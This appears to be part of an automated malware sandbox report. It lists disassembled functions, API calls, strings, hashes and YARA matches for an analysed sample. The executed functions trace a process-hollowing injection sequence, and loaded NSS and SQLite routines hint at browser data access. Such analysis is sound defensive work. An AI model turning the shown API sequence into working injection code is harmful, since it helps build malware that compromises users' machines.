                                                                                • Instruction Fuzzy Hash: B291A5327093918FC725CE28C8903DBBBE2ABD5314F594A6DD8E9873D1D6359841CB47
                                                                                Function 00422158 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 127COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00435440: RtlAllocateHeap.NTDLL(?,00000000,?), ref: 004354DD
                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,00000000,0000001E,00000000,00000000,?), ref: 004222C9
                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 004222FE
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2557418711.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2557418711.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_F441.jbxd
                                                                                Similarity
                                                                                • API ID: EnvironmentExpandStrings$AllocateHeap
                                                                                • String ID: hi
                                                                                • API String ID: 3432729115-3633523372
                                                                                • Opcode ID: 2c7b023f8f8e668f3c59ff73d8f09038c84363a572d6bc4f892e354ca4515ac2
                                                                                • Instruction ID: 955b234eacedc5ad79a5fbc0d5aeb5eb286d5c951f72c93c1ad7127c08102aad
                                                                                • Opcode Fuzzy Hash: 2c7b023f8f8e668f3c59ff73d8f09038c84363a572d6bc4f892e354ca4515ac2
                                                                                • Instruction Fuzzy Hash: 3F5187B06083919FE324CF14D8807ABBBE5FBC5704F90892DF9999B280CB749805CB97
                                                                                Function 021123BF Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 108COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,00000000,0000001E,00000000,00000000,?), ref: 02112530
                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 02112565
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2558343194.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_20f0000_F441.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: EnvironmentExpandStrings
                                                                                • String ID: hi
                                                                                • API String ID: 237503144-3633523372
                                                                                • Opcode ID: 29d7f95366c994b5a62b8ac23ea0115722bb9db87849136ec9dd399547f2272f
                                                                                • Instruction ID: 1dc39e1a85fe8304d5055989dfd679ae28a88997eece109cd7849961a0186333
                                                                                • Opcode Fuzzy Hash: 29d7f95366c994b5a62b8ac23ea0115722bb9db87849136ec9dd399547f2272f
                                                                                • Instruction Fuzzy Hash: AB4136B06483959FE324CF54C894BABBBE6FFC2740F90492CF9995B290D7749405CB92

                                                                                Execution Graph

                                                                                Execution Coverage:50.9%
                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                Signature Coverage:20.5%
                                                                                Total number of Nodes:39
                                                                                Total number of Limit Nodes:1
                                                                                execution_graph 391 429b010 392 429b049 391->392 400 429b0e1 392->400 401 4299850 392->401 396 429b115 419 4299fb0 396->419 398 429b1a7 422 429a4f0 NtAllocateVirtualMemory 398->422 402 4299875 401->402 403 4299fb0 VirtualAlloc 402->403 405 429990f 403->405 404 4299921 404->396 413 4299b10 404->413 405->404 406 4299989 NtCreateFile 405->406 407 4299a2b 406->407 412 4299a34 406->412 408 4299a36 CreateFileMappingA 407->408 407->412 409 4299a94 MapViewOfFile 408->409 410 4299a64 408->410 409->412 410->409 410->412 411 4299abc FindCloseChangeNotification 411->404 412->404 412->411 414 4299b5e 413->414 415 4299b77 414->415 416 4299c2d NtProtectVirtualMemory 414->416 415->396 431 429a150 416->431 420 4299ff1 419->420 421 429a024 VirtualAlloc 420->421 421->398 423 429a580 422->423 424 429a6f7 GetTempFileNameA 423->424 433 4299c90 424->433 426 429a71b CreateFileA WriteFile 427 429a780 CreateProcessA NtUnmapViewOfSection VirtualAllocEx WriteProcessMemory 426->427 428 429a82a 427->428 429 429a88e Wow64GetThreadContext Wow64SetThreadContext ResumeThread ExitProcess 428->429 430 429a851 WriteProcessMemory 428->430 429->400 430->428 432 4299c5c NtProtectVirtualMemory 431->432 432->415 435 4299c95 433->435 436 429a0d0 437 4299fb0 VirtualAlloc 436->437 438 429a0dd 437->438

                                                                                Callgraph

                                                                                Executed Functions

                                                                                Function 0429A4F0 Relevance: 24.8, APIs: 13, Strings: 1, Instructions: 317threadmemoryfileCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00003000,00000004), ref: 0429A561
                                                                                • GetTempFileNameA.KERNELBASE(?,kate,00000000,?), ref: 0429A714
                                                                                • CreateFileA.KERNELBASE(?,00000003,00000000,00000000,00000004,00000002,00000000), ref: 0429A742
                                                                                • WriteFile.KERNELBASE(00000000,?,000D7400,00000000,00000000), ref: 0429A76C
                                                                                • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000000,00000000), ref: 0429A7B6
                                                                                • NtUnmapViewOfSection.NTDLL(00000000,00400000), ref: 0429A7D0
                                                                                • VirtualAllocEx.KERNELBASE(00000000,00400000,?,00003000,00000040), ref: 0429A7FB
                                                                                • WriteProcessMemory.KERNELBASE(00000000,00400000,00000000,?,00000000), ref: 0429A81F
                                                                                • WriteProcessMemory.KERNELBASE(00000000,00000000,00000000,00000000,00000000), ref: 0429A881
                                                                                • Wow64GetThreadContext.KERNEL32(?,00010002), ref: 0429A8AF
                                                                                • Wow64SetThreadContext.KERNEL32(?,00010002), ref: 0429A8DA
                                                                                • ResumeThread.KERNELBASE(?), ref: 0429A8EC
                                                                                • ExitProcess.KERNEL32(00000000), ref: 0429A8F9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2367245852.0000000004299000.00000040.00001000.00020000.00000000.sdmp, Offset: 04299000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_4299000_9EDA.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Process$FileMemoryThreadWrite$ContextCreateVirtualWow64$AllocAllocateExitNameResumeSectionTempUnmapView
                                                                                • String ID: kate
                                                                                • API String ID: 1984375786-4076676908
                                                                                • Opcode ID: a5fb23d055b49c4060df56bacf9ee3ef03c1422c21c807da1347bc76d1211067
                                                                                • Instruction ID: 28f69de8f5fcbdba45fb3d6be4d562361bfdeb995189ba1042e0b8a554d9459f
                                                                                • Opcode Fuzzy Hash: a5fb23d055b49c4060df56bacf9ee3ef03c1422c21c807da1347bc76d1211067
                                                                                • Instruction Fuzzy Hash: BFE1D975A10209AFDB54CF84C895FEEB7B5BF88304F108199E908AB391D771AE85CF94
                                                                                Function 04299850 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 191filenativeCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                  • Part of subcall function 04299FB0: VirtualAlloc.KERNELBASE(00000000,0429990F,00003000,00000040), ref: 0429A034
                                                                                • NtCreateFile.NTDLL(00000000,00120089,00000018,?,00000000,00000080,00000001,00000001,00000040,00000000,00000000), ref: 04299A1B
                                                                                • FindCloseChangeNotification.KERNELBASE(00000000), ref: 04299ACC
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2367245852.0000000004299000.00000040.00001000.00020000.00000000.sdmp, Offset: 04299000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_4299000_9EDA.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocChangeCloseCreateFileFindNotificationVirtual
                                                                                • String ID: @
                                                                                • API String ID: 482251274-2766056989
                                                                                • Opcode ID: 0e0dc5585c33f2c4c31cdc6bfcf1500614589984357103c7c5ed85e8348694b7
                                                                                • Instruction ID: 54c68940dbce80f5b42ee03065d23d88ad41cc187615c2bd714e8540d57a08bd
                                                                                • Opcode Fuzzy Hash: 0e0dc5585c33f2c4c31cdc6bfcf1500614589984357103c7c5ed85e8348694b7
                                                                                • Instruction Fuzzy Hash: 5881FC71A10218AFEB24DF54DC55FDAB3B5EF48710F1481A9EA09AB390D7B06E84CF94
                                                                                Function 04299B10 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 115COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 59 4299b10-4299b75 call 4299740 62 4299b7e-4299b93 59->62 63 4299b77-4299b79 59->63 65 4299b9c-4299bb4 62->65 66 4299b95-4299b97 62->66 64 4299c81-4299c84 63->64 67 4299bbf-4299bc9 65->67 66->64 68 4299bcb-4299bdb 67->68 69 4299c17-4299c1b 67->69 70 4299bdd-4299c13 68->70 71 4299c15 68->71 72 4299c29-4299c2b 69->72 73 4299c1d-4299c21 69->73 70->69 71->67 72->64 73->72 74 4299c23-4299c27 73->74 74->72 76 4299c2d-4299c7c NtProtectVirtualMemory call 429a150 NtProtectVirtualMemory 74->76 76->64
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2367245852.0000000004299000.00000040.00001000.00020000.00000000.sdmp, Offset: 04299000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_4299000_9EDA.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: .tex
                                                                                • API String ID: 0-1946526065
                                                                                • Opcode ID: 86473fe90031cc0144bf05fc695b61ac0536840d3e25b293d5c37be5d6457d6f
                                                                                • Instruction ID: 6b04d5b24fc21ad9fb189ae4922a7d96e79ab106fc74996b72f6685918cab89e
                                                                                • Opcode Fuzzy Hash: 86473fe90031cc0144bf05fc695b61ac0536840d3e25b293d5c37be5d6457d6f
                                                                                • Instruction Fuzzy Hash: 2951D3B1E101099FCF04CF84C894BEEBBF5EF48314F248599D915AB380D775AA85CBA0
                                                                                Function 04299FB0 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46memoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • VirtualAlloc.KERNELBASE(00000000,0429990F,00003000,00000040), ref: 0429A034
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2367245852.0000000004299000.00000040.00001000.00020000.00000000.sdmp, Offset: 04299000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_4299000_9EDA.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocVirtual
                                                                                • String ID: VirtualAlloc
                                                                                • API String ID: 4275171209-164498762
                                                                                • Opcode ID: c42a450ca02fa363a87eb9b6114333d3fd783ad335b2bc0464273431a807ed53
                                                                                • Instruction ID: 16514c8a24616c27c4f27de8bb6f2df99b0ec3f767ee42b635012bd32b9c15d7
                                                                                • Opcode Fuzzy Hash: c42a450ca02fa363a87eb9b6114333d3fd783ad335b2bc0464273431a807ed53
                                                                                • Instruction Fuzzy Hash: 9211D0A0D083C9EAFF01DBE898097EEBFB55F15708F044098D9446A282D6BA5758C7A6

                                                                                Non-executed Functions

                                                                                Function 6D017C00 Relevance: 31.9, APIs: 21, Instructions: 421COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PR_SetError.NSS3(FFFFE005,00000000), ref: 6D017C33
                                                                                • NSS_OptionGet.NSS3(0000000C,00000000), ref: 6D017C66
                                                                                • CERT_DestroyCertificate.NSS3(00000000), ref: 6D017D1E
                                                                                  • Part of subcall function 6D017870: SECOID_FindOID_Util.NSS3(?,?,?,6D0191C5), ref: 6D01788F
                                                                                • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6D017D48
                                                                                • PR_SetError.NSS3(FFFFE067,00000000), ref: 6D017D71
                                                                                • SECKEY_DestroyPublicKey.NSS3(00000000), ref: 6D017DD3
                                                                                • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6D017DE1
                                                                                • PR_SetError.NSS3(FFFFE005,00000000), ref: 6D017DF8
                                                                                • SECKEY_DestroyPublicKey.NSS3(?), ref: 6D017E1A
                                                                                • PR_SetError.NSS3(FFFFE067,00000000), ref: 6D017E58
                                                                                  • Part of subcall function 6D017870: PR_SetError.NSS3(FFFFE005,00000000,?,?,6D0191C5), ref: 6D0178BB
                                                                                  • Part of subcall function 6D017870: PORT_ZAlloc_Util.NSS3(0000000C,?,?,?,6D0191C5), ref: 6D0178FA
                                                                                  • Part of subcall function 6D017870: strchr.VCRUNTIME140(?,0000003A,?,?,?,?,?,?,?,?,?,?,6D0191C5), ref: 6D017930
                                                                                  • Part of subcall function 6D017870: PORT_Alloc_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6D0191C5), ref: 6D017951
                                                                                  • Part of subcall function 6D017870: memcpy.VCRUNTIME140(00000000,?,?), ref: 6D017964
                                                                                  • Part of subcall function 6D017870: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6D01797A
                                                                                  • Part of subcall function 6D017870: strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000001), ref: 6D017988
                                                                                  • Part of subcall function 6D017870: memcpy.VCRUNTIME140(?,00000001,00000001), ref: 6D017998
                                                                                  • Part of subcall function 6D017870: free.MOZGLUE(00000000), ref: 6D0179A7
                                                                                  • Part of subcall function 6D017870: SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?,?,?,?,?,?,6D0191C5), ref: 6D0179BB
                                                                                  • Part of subcall function 6D017870: PR_GetCurrentThread.NSS3(?,?,?,?,6D0191C5), ref: 6D0179CA
                                                                                • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6D017E49
                                                                                • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6D017F8C
                                                                                • SECKEY_DestroyPublicKey.NSS3(?), ref: 6D017F98
                                                                                • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6D017FBF
                                                                                • SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6D017FD9
                                                                                • PK11_ImportEncryptedPrivateKeyInfoAndReturnKey.NSS3(?,00000000,?,?,?,00000001,00000001,?,?,00000000,?), ref: 6D018038
                                                                                • SECITEM_ZfreeItem_Util.NSS3(00000000,00000000), ref: 6D018050
                                                                                • PK11_ImportPublicKey.NSS3(?,?,00000001), ref: 6D018093
                                                                                • SECOID_FindOID_Util.NSS3 ref: 6D017F29
                                                                                  • Part of subcall function 6D0107B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6CFB8298,?,?,?,6CFAFCE5,?), ref: 6D0107BF
                                                                                  • Part of subcall function 6D0107B0: PL_HashTableLookup.NSS3(?,?), ref: 6D0107E6
                                                                                  • Part of subcall function 6D0107B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6D01081B
                                                                                  • Part of subcall function 6D0107B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6D010825
                                                                                • SECKEY_DestroyPublicKey.NSS3(00000000), ref: 6D018072
                                                                                • SECOID_FindOID_Util.NSS3 ref: 6D0180F5
                                                                                  • Part of subcall function 6D01BC10: SECITEM_CopyItem_Util.NSS3(?,?,?,?,-00000001,?,6D01800A,00000000,?,00000000,?), ref: 6D01BC3F
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: Util$Item_$Error$Zfree$DestroyPublic$Find$Alloc_CopyHashImportK11_LookupTablememcpy$AlgorithmCertificateConstCurrentEncryptedInfoOptionPrivateReturnTag_Threadfreestrchrstrcmpstrlen
                                                                                • String ID:
                                                                                • API String ID: 2815116071-0
                                                                                • Opcode ID: b064d8693c197394bb9ff171fb3d14d052cd629ae44592a52e4f502f386cfc27
                                                                                • Instruction ID: c78bb475ea56feff6f30eec668e87a57b9eb334f9f3454585080427ab34218da
                                                                                • Opcode Fuzzy Hash: b064d8693c197394bb9ff171fb3d14d052cd629ae44592a52e4f502f386cfc27
                                                                                • Instruction Fuzzy Hash: 2CE16C71A0C202EFF711CF64CC80B6A77E5BF89308F55496CE99A9B251E731E905CB92
                                                                                Function 6CFA1C30 Relevance: 26.3, APIs: 14, Strings: 1, Instructions: 96memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetCurrentProcess.KERNEL32 ref: 6CFA1C6B
                                                                                • OpenProcessToken.ADVAPI32(00000000,00000008,?), ref: 6CFA1C75
                                                                                • GetTokenInformation.ADVAPI32(00000400,00000004,?,00000400,?), ref: 6CFA1CA1
                                                                                • GetLengthSid.ADVAPI32(?), ref: 6CFA1CA9
                                                                                • malloc.MOZGLUE(00000000), ref: 6CFA1CB4
                                                                                • CopySid.ADVAPI32(00000000,00000000,?), ref: 6CFA1CCC
                                                                                • GetTokenInformation.ADVAPI32(?,00000005(TokenIntegrityLevel),?,00000400,?), ref: 6CFA1CE4
                                                                                • GetLengthSid.ADVAPI32(?), ref: 6CFA1CEC
                                                                                • malloc.MOZGLUE(00000000), ref: 6CFA1CFD
                                                                                • CopySid.ADVAPI32(00000000,00000000,?), ref: 6CFA1D0F
                                                                                • CloseHandle.KERNEL32(?), ref: 6CFA1D17
                                                                                • AllocateAndInitializeSid.ADVAPI32 ref: 6CFA1D4D
                                                                                • GetLastError.KERNEL32 ref: 6CFA1D73
                                                                                • PR_LogPrint.NSS3(_PR_NT_InitSids: OpenProcessToken() failed. Error: %d,00000000), ref: 6CFA1D7F
                                                                                Strings
                                                                                • _PR_NT_InitSids: OpenProcessToken() failed. Error: %d, xrefs: 6CFA1D7A
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: Token$CopyInformationLengthProcessmalloc$AllocateCloseCurrentErrorHandleInitializeLastOpenPrint
                                                                                • String ID: _PR_NT_InitSids: OpenProcessToken() failed. Error: %d
                                                                                • API String ID: 3748115541-1216436346
                                                                                • Opcode ID: 571b2237b98a884af39a189a5d1c090c027618c2c0445f981310a00929639b6a
                                                                                • Instruction ID: 1f16a4e271431df25b44e3ceb1ab9fb43ebd3e76f59b58c8183cab674830ce17
                                                                                • Opcode Fuzzy Hash: 571b2237b98a884af39a189a5d1c090c027618c2c0445f981310a00929639b6a
                                                                                • Instruction Fuzzy Hash: 3D3195B5900218EFEF10EF64DC48BAABBB9FF4A304F004069FA09D2151EB705994CF65
                                                                                Function 6CF51C30 Relevance: 23.2, APIs: 3, Strings: 10, Instructions: 485COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CF51D58
                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CF51EFD
                                                                                • sqlite3_exec.NSS3(00000000,00000000,Function_00007370,?,00000000), ref: 6CF51FB7
                                                                                Strings
                                                                                • unknown error, xrefs: 6CF52291
                                                                                • attached databases must use the same text encoding as main database, xrefs: 6CF520CA
                                                                                • unsupported file format, xrefs: 6CF52188
                                                                                • sqlite_master, xrefs: 6CF51C61
                                                                                • SELECT*FROM"%w".%s ORDER BY rowid, xrefs: 6CF51F83
                                                                                • no more rows available, xrefs: 6CF52264
                                                                                • another row available, xrefs: 6CF52287
                                                                                • table, xrefs: 6CF51C8B
                                                                                • sqlite_temp_master, xrefs: 6CF51C5C
                                                                                • abort due to ROLLBACK, xrefs: 6CF52223
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_byteswap_ulongsqlite3_exec
                                                                                • String ID: SELECT*FROM"%w".%s ORDER BY rowid$abort due to ROLLBACK$another row available$attached databases must use the same text encoding as main database$no more rows available$sqlite_master$sqlite_temp_master$table$unknown error$unsupported file format
                                                                                • API String ID: 563213449-2102270813
                                                                                • Opcode ID: 5884be84fb915420455319ebd1848284fd21bf0f558027c068fa5c3acfbff641
                                                                                • Instruction ID: bf3d8ca8fab2100f647a4be709942426630333b87f97ef49fbedb2a79a2452b2
                                                                                • Opcode Fuzzy Hash: 5884be84fb915420455319ebd1848284fd21bf0f558027c068fa5c3acfbff641
                                                                                • Instruction Fuzzy Hash: 4112DF706083019FD714CF19C484B5ABBF2BF95318F59866DEA898B712D732EC56CB82
                                                                                Function 6CFDFC80 Relevance: 19.8, APIs: 13, Instructions: 311COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PK11_HPKE_NewContext.NSS3(?,?,?,00000000,00000000), ref: 6CFDFD06
                                                                                  • Part of subcall function 6CFDF670: PORT_ZAlloc_Util.NSS3(00000038), ref: 6CFDF696
                                                                                  • Part of subcall function 6CFDF670: PK11_FreeSymKey.NSS3(?,?,?), ref: 6CFDF789
                                                                                  • Part of subcall function 6CFDF670: SECITEM_ZfreeItem_Util.NSS3(?,00000001,?,?,?), ref: 6CFDF796
                                                                                  • Part of subcall function 6CFDF670: free.MOZGLUE(00000000,?,?,?,?,?), ref: 6CFDF79F
                                                                                  • Part of subcall function 6CFDF670: SECITEM_DupItem_Util.NSS3 ref: 6CFDF7F0
                                                                                  • Part of subcall function 6D003440: PK11_GetAllTokens.NSS3 ref: 6D003481
                                                                                  • Part of subcall function 6D003440: PR_SetError.NSS3(00000000,00000000), ref: 6D0034A3
                                                                                  • Part of subcall function 6D003440: TlsGetValue.KERNEL32 ref: 6D00352E
                                                                                  • Part of subcall function 6D003440: EnterCriticalSection.KERNEL32(?), ref: 6D003542
                                                                                  • Part of subcall function 6D003440: PR_Unlock.NSS3(?), ref: 6D00355B
                                                                                • SECITEM_DupItem_Util.NSS3(?), ref: 6CFDFDAD
                                                                                  • Part of subcall function 6D00FD80: PORT_Alloc_Util.NSS3(0000000C,?,?,00000001,?,6CFB9003,?), ref: 6D00FD91
                                                                                  • Part of subcall function 6D00FD80: PORT_Alloc_Util.NSS3(A4686D01,?), ref: 6D00FDA2
                                                                                  • Part of subcall function 6D00FD80: memcpy.VCRUNTIME140(00000000,12D068C3,A4686D01,?,?), ref: 6D00FDC4
                                                                                • SECITEM_DupItem_Util.NSS3(?), ref: 6CFDFE00
                                                                                  • Part of subcall function 6D00FD80: free.MOZGLUE(00000000,?,?), ref: 6D00FDD1
                                                                                  • Part of subcall function 6CFFE550: PR_SetError.NSS3(FFFFE005,00000000), ref: 6CFFE5A0
                                                                                • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CFDFEBB
                                                                                • PK11_FreeSymKey.NSS3(00000000), ref: 6CFDFEC8
                                                                                • PK11_HPKE_DestroyContext.NSS3(00000000,00000001), ref: 6CFDFED3
                                                                                • PR_SetError.NSS3(FFFFE002,00000000), ref: 6CFDFF0C
                                                                                • PR_SetError.NSS3(FFFFE002,00000000), ref: 6CFDFF23
                                                                                • PK11_ImportSymKey.NSS3(?,?,00000004,82000105,?,00000000), ref: 6CFDFF4D
                                                                                • PR_SetError.NSS3(FFFFE002,00000000), ref: 6CFDFFDA
                                                                                • PK11_ImportSymKey.NSS3(?,0000402A,00000004,0000010C,?,00000000), ref: 6CFE0007
                                                                                • PK11_CreateContextBySymKey.NSS3(?,82000105,?,?), ref: 6CFE0029
                                                                                • PR_SetError.NSS3(FFFFE002,00000000), ref: 6CFE0044
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: K11_$ErrorUtil$Item_$Alloc_Context$FreeImportfree$CreateCriticalDestroyEnterSectionTokensUnlockValueZfreememcpy
                                                                                • String ID:
                                                                                • API String ID: 138705723-0
                                                                                • Opcode ID: 0a3f1c8351c84a5fa6cdf7ad015bd74d90945ef666989a9b4edcaf1cf19f5465
                                                                                • Instruction ID: 8635ceeaaec17a66f9bd3e0f9680fe63e6e7bb24ef1c5bc68667962f2d70c422
                                                                                • Opcode Fuzzy Hash: 0a3f1c8351c84a5fa6cdf7ad015bd74d90945ef666989a9b4edcaf1cf19f5465
                                                                                • Instruction Fuzzy Hash: ACB19271604201AFE704CF29CC40E6BB7E5FF88318F5A8A1DE999C7651E770E945CB92
                                                                                Function 6CFD7D60 Relevance: 18.3, APIs: 12, Instructions: 299COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SECOID_FindOID_Util.NSS3(?), ref: 6CFD7DDC
                                                                                  • Part of subcall function 6D0107B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6CFB8298,?,?,?,6CFAFCE5,?), ref: 6D0107BF
                                                                                  • Part of subcall function 6D0107B0: PL_HashTableLookup.NSS3(?,?), ref: 6D0107E6
                                                                                  • Part of subcall function 6D0107B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6D01081B
                                                                                  • Part of subcall function 6D0107B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6D010825
                                                                                • SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6CFD7DF3
                                                                                • PK11_PBEKeyGen.NSS3(?,00000000,00000000,00000000,?), ref: 6CFD7F07
                                                                                • PK11_GetPadMechanism.NSS3(00000000), ref: 6CFD7F57
                                                                                • PK11_UnwrapPrivKey.NSS3(?,00000000,00000000,?,0000001C,00000000,?,?,?,00000000,00000130,00000004,?), ref: 6CFD7F98
                                                                                • PK11_FreeSymKey.NSS3(?), ref: 6CFD7FC9
                                                                                • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CFD7FDE
                                                                                • PK11_PBEKeyGen.NSS3(?,?,00000000,00000001,?), ref: 6CFD8000
                                                                                  • Part of subcall function 6CFF9430: SECOID_GetAlgorithmTag_Util.NSS3(00000000,?,?,00000000,00000000,?,6CFD7F0C,?,00000000,00000000,00000000,?), ref: 6CFF943B
